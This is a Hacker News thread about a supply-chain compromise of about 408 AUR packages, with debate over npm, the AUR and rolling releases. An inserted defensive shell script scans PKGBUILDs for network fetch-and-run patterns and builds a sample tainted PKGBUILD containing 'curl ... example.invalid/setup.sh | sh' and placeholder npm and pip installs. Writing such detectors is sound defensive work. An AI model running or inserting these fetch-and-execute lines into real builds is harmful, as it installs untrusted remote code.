
Posted by keyle 16 hours ago

AUR packages compromised with Infostealer and Rootkit(discourse.ifin.network)
255 points | 186 comments (page 4)
QuantumNoodle 11 hours ago
Man, I never hear good security things about npm
Retr0id 11 hours ago
This doesn't really have anything to do with npm.
vitamark 10 hours ago
anything except that it's malware installed via npm
Retr0id 46 minutes ago
As you can see here, they've already switched it out for a different command, likely due to incident responders over-indexing on npm as an IOC.

https://news.ycombinator.com/item?id=48503258

notabotiswear 10 hours ago
From the Arch mailing list [0]

> The result is a rather long list of ~408 packages all doing npm install atomic-lockfile something something

[0] https://lists.archlinux.org/archives/list/aur-general@lists....

Retr0id 10 hours ago
They could've pip installed, curl|sh'd or anything else, it's not relevant to the underlying issue.
notabotiswear 10 hours ago
Perhaps there were other vectors, but npm was the one used here.

And yes, this is an AUR issue, but npm being used to host and disseminate malware is also [a chronic] one, even if separate.

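The point made above (the fetch command can be swapped for pip, curl|sh or anything else, so responders who key only on npm miss the next variant) as a defender-side check. This is an added example, not code from the thread, from Arch or from the incident write-up: it scans a PKGBUILD for several network fetch-and-run idioms rather than a single one. The sample PKGBUILD, its package names and the example.invalid URLs are constructed placeholders.

```shell
#!/bin/sh
# Flag PKGBUILD lines that fetch and run code from the network at build or
# install time. Several fetch-and-run idioms are matched, not only
# "npm install", so the check does not hinge on a single IOC.

scan_pkgbuild() {
    # $1: path to a PKGBUILD. Prints "line:text" per suspicious non-comment
    # line. Always exits 0 so callers can count the output.
    grep -nE \
        -e '\bnpm[[:space:]]+(install|i|exec|x)\b' -e '\b(npx|pnpm|yarn)\b' \
        -e '\bpip3?[[:space:]]+install\b' \
        -e '\b(curl|wget)\b[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba)?sh\b' \
        "$1" | grep -vE '^[0-9]+:[[:space:]]*#' || true
}

count_hits() {
    # $1: path to a PKGBUILD. Prints the number of suspicious lines.
    scan_pkgbuild "$1" | wc -l | tr -d ' '
}

write_sample_pkgbuild() {
    # $1: "clean" or "tainted". Writes a constructed PKGBUILD (placeholder
    # names, not from the incident) to a temp file and prints its path.
    f=$(mktemp)
    {
        cat <<'EOF'
pkgname=example-tool
pkgver=1.0.0
source=("https://example.invalid/example-tool-1.0.0.tar.gz")

package() {
  cd "$srcdir/example-tool-1.0.0"
EOF
        [ "$1" = tainted ] && cat <<'EOF'
  npm install example-lockfile-placeholder
  pip install --user example-helper-placeholder
  curl -fsSL https://example.invalid/setup.sh | sh
EOF
        cat <<'EOF'
  make DESTDIR="$pkgdir" install
}
EOF
    } > "$f"
    printf '%s\n' "$f"
}

# Stand-alone demo on the constructed tainted PKGBUILD.
t=$(write_sample_pkgbuild tainted); scan_pkgbuild "$t"; rm -f "$t"
```

Run it against the PKGBUILDs an AUR helper has cloned (for example `for p in ~/.cache/*/*/PKGBUILD; do scan_pkgbuild "$p"; done`, path assumed) before building anything the helper fetched.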
animitronix 9 hours ago
So true. The JavaScript ecosystem is trash.
virajk_31 11 hours ago
AUR doesn't guarantee security; it's up to the user to use AUR and verify before installing anything. It's very evident why Arch is not used in enterprise solutions.
fooqux 11 hours ago
It's not the AUR. It's the rolling release cycle, and probably even more importantly, lack of support options.
datakan 10 hours ago
The AUR has absolutely nothing to do with the rolling release cycle
virajk_31 9 hours ago
Yes, and the comment didn't mention that both are dependent; fooqux is correct.
datakan 9 hours ago
He literally said "It's the rolling release cycle"; he is not correct.
luxpir 8 hours ago
You're reading it wrong. He's giving an alternative reason why it's not used in enterprise.
virajk_31 9 hours ago
Agree
hootz 11 hours ago
Arch is not used in enterprise solutions because of the AUR? Can't you just not use it?
virajk_31 9 hours ago
AUR is a choice; rolling release is the reason.
this_user 8 hours ago
No, it's not. If Debian had a community-maintained repo of additional packages, the same thing could happen there.

The fundamental problem is having something that has very loose oversight and next to no controls. That may have worked in the past, but in the day and age of constant supply chain attacks, it's a major liability.

NekkoDroid 6 hours ago
GP was talking about why Arch isn't used in enterprise, not what happened in the post.
SahAssar 8 hours ago
Rolling release has nothing to do with this. It could just as well be a PPA in Ubuntu or any deb repo for Debian or similar.
hootz 5 hours ago
Makes sense.